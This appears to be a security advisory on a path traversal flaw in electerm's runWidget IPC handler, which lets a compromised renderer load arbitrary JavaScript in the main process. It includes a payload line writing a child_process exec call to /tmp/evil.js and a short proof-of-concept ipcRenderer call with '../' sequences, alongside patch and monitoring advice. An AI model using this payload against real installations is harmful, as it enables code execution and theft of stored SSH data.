The vulnerability resides in the `runWidget` function defined in src/app/widgets/load-widget.js. This function builds a file name by interpolating a user-supplied `widgetId` directly into a template string, const file = `widget-${widgetId}.js`, with no sanitization or validation of `widgetId`, and then loads the result with `require(path.join(__dirname, file))`.

`runWidget` is exposed to the renderer process through an asynchronous IPC handler. Because the renderer can be compromised (for example via a malicious plugin or an XSS flaw in the built-in webview), an attacker can invoke this handler with a crafted `widgetId` containing path traversal sequences such as `../`. `path.join` normalizes those segments, so the resulting path escapes the intended widget directory and can point at any `.js` file on the victim's filesystem (the handler appends the `.js` extension itself, so the attacker needs a file with that extension in a location they can write to, such as a world-writable temporary directory). The loaded module executes with the full privileges of the electerm main process, giving the attacker local code execution and potentially complete system compromise. No input validation or sandboxing is applied at the IPC boundary.

The issue is fixed in electerm version 3.7.16 and later.
Platform: electerm
Version: <3.7.16
Vulnerability: Path Traversal
Severity: Medium
Date: 2024-04-15 (estimated disclosure)
Prediction: Already patched (v3.7.16)
What Undercode Say:
Analytics:
Identify vulnerable versions (everything below 3.7.16, including 3.7.0 through 3.7.15)
npm list -g electerm 2>/dev/null | grep -E 'electerm@([0-2]\.|3\.[0-6]\.|3\.7\.([0-9]|1[0-5])([^0-9]|$))'
Check for insecure IPC exposure (locate the handler that registers runWidget)
grep -rn "runWidget" src/
Simulate path traversal payload ("calc" is a Windows binary; substitute a harmless command when testing on Linux or macOS)
echo 'require("child_process").exec("calc")' > /tmp/evil.js
Trigger via renderer (conceptual; the handler appends ".js" itself, and the number of "../" depends on where the app is installed)
ipcRenderer.invoke('runWidget', '../../../tmp/evil')
Exploit:
// Attacker-controlled renderer code (e.g., via a malicious plugin); assumes the
// renderer has Node access so that require('electron') works
const { ipcRenderer } = require('electron');
// Path traversal to load arbitrary JS. The handler appends ".js" itself, so the
// extension is omitted. The number of "../" depends on the install location, and
// one extra "../" is needed because the literal "widget-" prefix turns the first
// segment into an ordinary directory name rather than a traversal step.
ipcRenderer.invoke('runWidget', '../../../users/attacker/payload').catch(console.log);
// Payload file (e.g., /users/attacker/payload.js) contains the code to be executed
Protection from this CVE:
- Upgrade to electerm >= 3.7.16 immediately.
- If upgrading is impossible, do not install untrusted plugins and do not load untrusted remote content in the built-in webview; a compromised renderer is the precondition for reaching the handler.
- Run electerm under sandboxing (bubblewrap on Linux, AppArmor, or Windows Sandbox) to limit what loaded code can reach.
- Monitor the electerm process for unexpected child processes and for JavaScript files loaded from outside its installation directory; the IPC calls themselves stay inside the process and are not visible to ordinary process monitoring tools.
Impact:
Complete local code execution with electerm's privileges: the attacker can read and write the user's files (including the SSH connection data the client stores), install backdoors, pivot to hosts reachable from the victim, or compromise the host system entirely.
Sources:
Reported By: github.com